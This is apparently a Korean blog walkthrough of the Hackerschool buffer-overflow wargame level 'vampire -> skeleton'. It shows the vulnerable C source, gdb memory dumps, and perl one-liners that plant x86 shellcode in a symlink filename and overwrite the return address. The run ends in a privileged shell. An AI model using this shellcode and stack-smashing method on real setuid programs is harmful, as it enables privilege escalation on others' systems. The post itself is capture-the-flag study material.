hackerschool bof 원정대 vampire -> skeleton

2012. 1. 19. 14:11 from MyStudy/BOF원정대
LEVEL10 (vampire -> skeleton) : argv hunter

argv hunter는 argv를 비우는 문제인가.. 일단 코드를 보자

[vampire@localhost .izayoi]$ cat skeleton.c
#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc;

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // shellcode hunter
        memset(buffer, 0, 40);

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i]));
}


이번에는 argv를 전부 없애버린다. 그동안 쓰던 argv영역을 모조리 쓸 수 없게 되었다.
자료를 찾다보니 스택의 맨 끝부분에서는 파일명이 들어간다고 한다(0xbfffffff의 조금 앞쪽부분)

 [vampire@localhost .izayoi]$ ls
aaaaaaaaa  core  skeleton  skeleton.c
[vampire@localhost .izayoi]$ ./aaaaaaaaa `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[vampire@localhost .izayoi]$ gdb -c core -q
Core was generated by `                                                            '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/70x $esp
...
0xbfffffe0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffff0:     0x61612f2e      0x61616161      0x00616161      0x00000000
0xc0000000:     Cannot access memory at address 0xc0000000

그렇다면 다시 심볼릭 링크를 걸고 파일명에다가 쉘코드를 집어은 뒤에 그 뒷부분영역을 ret에 넣으면 될것같다.

[vampire@localhost .izayoi]$ ln -s skeleton `perl -e 'print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[vampire@localhost .izayoi]$ ls
core
skeleton
skeleton.c
????????????????????????????????????????????????????????????????????????????????????????????????????ë?^1ɱ2?l?ÿ??é?uöë?èêÿÿÿ2ÁQi00tii0cjo?äQT?â?±?Î?
[vampire@localhost .izayoi]$ ./`perl -e 'print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[vampire@localhost .izayoi]$ gdb -c core -q
Core was generated by `                                                                              '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/70x 0xbfffff50
0xbfffff50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff60:     0x00000000      0x902f2e00      0x90909090      0x90909090
0xbfffff70:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff80:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff90:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffa0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffb0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffc0:     0x90909090      0x90909090      0xeb909090      0xc9315e11
0xbfffffd0:     0x6c8032b1      0x8001ff0e      0xf67501e9      0xeae805eb
0xbfffffe0:     0x32ffffff      0x306951c1      0x69697430      0x6f6a6330
0xbffffff0:     0x5451e48a      0xb19ae28a      0x0081ce0c      0x00000000
0xc0000000:     Cannot access memory at address 0xc0000000

심볼릭 링크를 걸구... 위치를 확인하구...

 [vampire@localhost .izayoi]$ ln -s skeleton `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[vampire@localhost .izayoi]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44,"\xd2\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Òÿÿ¿
Segmentation fault (core dumped)
[vampire@localhost .izayoi]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `                                                                              '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffffd2 in ?? ()
(gdb) x/70x 0xbfffffd2
0xbfffffd2:     0xff0e6c80      0x01e98001      0x05ebf675      0xffffeae8
0xbfffffe2:     0x51c132ff      0x74303069      0x63306969      0xe48a6f6a
0xbffffff2:     0xe28a5451      0xce0cb19a      0x00000081      Cannot access memory at address 0xbffffffe
(gdb)

한참을 시도했는데 안된다. 나는 내가 잘못한것인줄 알았으나 ret에서 가리키는 부분을 확인해보니 0xbfffffd2부분을 가리키고 있었다.
흠... 48byte짜리 쉘코드가 너무 긴가보다.

[vampire@localhost vampire]$ ln -s skeleton `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x44,"\xa0\xff\xff\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ÿÿ¿
bash$ id;my-pass
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
euid = 510
shellcoder

다른 쉘코드를 하니 됐는데 디버깅해서 확인해보고 싶은데 제대로 확인하지 못하고 일단 실험을 종료하였다.

p.s. 추가

http://devanix.tistory.com/145

해당 링크를 확인하면 이 문제의 다른 풀이가 있다.
rtl기법을 이용한 쉘코드로써 http://www.hackerschool.org/HS_Boards/data/Lib_system/rtl_sc.txt 여기에 또 자세한 설명이 있다.

이 문제도 푸는 방법은 동일하나 쉘코드 작성에 대해서 서술했기에 한번 링크를 걸게 되었다.
저작자표시

'MyStudy > BOF원정대' 카테고리의 다른 글

hackerschool bof 원정대 darkknight-> bugbear  (0) 2012.01.24
hackerschool bof 원정대 bugbear -> giant  (0) 2012.01.19
hackerschool bof 원정대 troll -> vampire  (0) 2012.01.19
hackerschool bof 원정대 orge -> troll  (0) 2012.01.19
hackerschool bof 원정대 darkelf -> orge  (0) 2012.01.19
Posted by john@memory :

티스토리툴바